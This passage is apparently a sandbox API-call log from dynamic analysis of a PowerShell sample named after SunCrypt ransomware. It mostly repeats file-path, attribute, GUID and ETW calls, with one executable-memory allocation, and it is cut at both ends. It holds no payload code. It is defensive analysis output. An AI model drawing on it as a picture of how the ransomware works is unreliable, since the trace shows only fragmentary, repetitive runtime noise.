[3]=0xa1, [4]=0x48, [5]=0xde, [6]=0x8a, [7]=0xdc))) returned 0x0 [0103.707] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.707] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701652365595) returned 1 [0103.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.707] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.708] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.708] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.709] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701652560660) returned 1 [0103.709] EtwEventActivityIdControl () returned 0x0 [0103.709] EtwEventActivityIdControl () returned 0x0 [0103.709] EtwEventActivityIdControl () returned 0x0 [0103.710] EtwEventActivityIdControl () returned 0x0 [0103.710] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1c14eff1, Data2=0x20c8, Data3=0x4bbf, Data4=([0]=0xaa, [1]=0x77, [2]=0x79, [3]=0x79, [4]=0xcc, [5]=0x2d, [6]=0xb1, [7]=0xa9))) returned 0x0 [0103.710] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.711] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701652712174) returned 1 [0103.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.711] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.713] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701652923939) returned 1 [0103.713] EtwEventActivityIdControl () returned 0x0 [0103.713] EtwEventActivityIdControl () returned 0x0 [0103.713] EtwEventActivityIdControl () returned 0x0 [0103.713] EtwEventActivityIdControl () returned 0x0 [0103.713] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x4322929b, Data2=0x8156, Data3=0x4998, Data4=([0]=0xae, [1]=0xbb, [2]=0x32, [3]=0xe3, [4]=0x2, [5]=0x38, [6]=0x61, [7]=0xb3))) returned 0x0 [0103.714] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.714] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701653317814) returned 1 [0103.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.717] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.723] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701653970327) returned 1 [0103.723] EtwEventActivityIdControl () returned 0x0 [0103.723] EtwEventActivityIdControl () returned 0x0 [0103.723] EtwEventActivityIdControl () returned 0x0 [0103.724] EtwEventActivityIdControl () returned 0x0 [0104.050] VirtualAlloc (lpAddress=0x0, dwSize=0xfca, flAllocationType=0x1000, flProtect=0x40) returned 0x41e0000 [0104.059] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x51f5c552, Data2=0x4aa, Data3=0x46a1, Data4=([0]=0xa7, [1]=0xed, [2]=0x77, [3]=0x21, [4]=0x9a, [5]=0x3e, [6]=0xe0, [7]=0xfa))) returned 0x0 [0104.060] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.060] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701687636451) returned 1 [0104.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.060] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.061] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701687810800) returned 1 [0104.062] EtwEventActivityIdControl () returned 0x0 [0104.062] EtwEventActivityIdControl () returned 0x0 [0104.062] EtwEventActivityIdControl () returned 0x0 [0104.062] EtwEventActivityIdControl () returned 0x0 [0104.062] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xd7846124, Data2=0xfbe9, Data3=0x401f, Data4=([0]=0xa7, [1]=0xff, [2]=0x98, [3]=0x87, [4]=0x70, [5]=0x0, [6]=0x62, [7]=0xc4))) returned 0x0 [0104.062] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.063] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701687929127) returned 1 [0104.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.063] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.065] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701688204981) returned 1 [0104.066] EtwEventActivityIdControl () returned 0x0 [0104.066] EtwEventActivityIdControl () returned 0x0 [0104.066] EtwEventActivityIdControl () returned 0x0 [0104.066] EtwEventActivityIdControl () returned 0x0 [0104.066] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8717aa56, Data2=0x1970, Data3=0x47ea, Data4=([0]=0xa2, [1]=0xd3, [2]=0x7, [3]=0x26, [4]=0x1b, [5]=0x77, [6]=0xc2, [7]=0x2d))) returned 0x0 [0104.066] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.067] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701688329059) returned 1 [0104.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.067] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.068] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701688489627) returned 1 [0104.068] EtwEventActivityIdControl () returned 0x0 [0104.068] EtwEventActivityIdControl () returned 0x0 [0104.068] EtwEventActivityIdControl () returned 0x0 [0104.069] EtwEventActivityIdControl () returned 0x0 [0104.069] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbd9ae212, Data2=0x70c3, Data3=0x4931, Data4=([0]=0x98, [1]=0x8a, [2]=0x5a, [3]=0xe6, [4]=0x7c, [5]=0x5f, [6]=0x1a, [7]=0xd2))) returned 0x0 [0104.069] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.069] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701688606820) returned 1 [0104.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.070] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.071] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701688762775) returned 1 [0104.071] EtwEventActivityIdControl () returned 0x0 [0104.071] EtwEventActivityIdControl () returned 0x0 [0104.071] EtwEventActivityIdControl () returned 0x0 [0104.071] EtwEventActivityIdControl () returned 0x0 [0104.071] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdf86b848, Data2=0xfaa0, Data3=0x4f23, Data4=([0]=0xb6, [1]=0xa6, [2]=0x9e, [3]=0xa2, [4]=0x39, [5]=0x3d, [6]=0xc2, [7]=0x23))) returned 0x0 [0104.072] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.072] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701688873421) returned 1 [0104.072] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.072] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.072] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.074] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701689031416) returned 1 [0104.074] EtwEventActivityIdControl () returned 0x0 [0104.074] EtwEventActivityIdControl () returned 0x0 [0104.074] EtwEventActivityIdControl () returned 0x0 [0104.074] EtwEventActivityIdControl () returned 0x0 [0104.074] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc92e138a, Data2=0xea75, Data3=0x493d, Data4=([0]=0x9a, [1]=0x53, [2]=0x7f, [3]=0x2f, [4]=0xb1, [5]=0x48, [6]=0x1e, [7]=0x89))) returned 0x0 [0104.075] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.075] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701689141766) returned 1 [0104.075] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.075] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.075] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.075] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.075] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.076] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701689296162) returned 1 [0104.076] EtwEventActivityIdControl () returned 0x0 [0104.077] EtwEventActivityIdControl () returned 0x0 [0104.077] EtwEventActivityIdControl () returned 0x0 [0104.077] EtwEventActivityIdControl () returned 0x0 [0104.077] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xd7c8370a, Data2=0xa085, Data3=0x4e20, Data4=([0]=0xa5, [1]=0x50, [2]=0x9e, [3]=0x2e, [4]=0x2f, [5]=0x88, [6]=0x25, [7]=0xa9))) returned 0x0 [0104.077] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.077] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701689406294) returned 1 [0104.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.078] GetFullPathNameW (in: 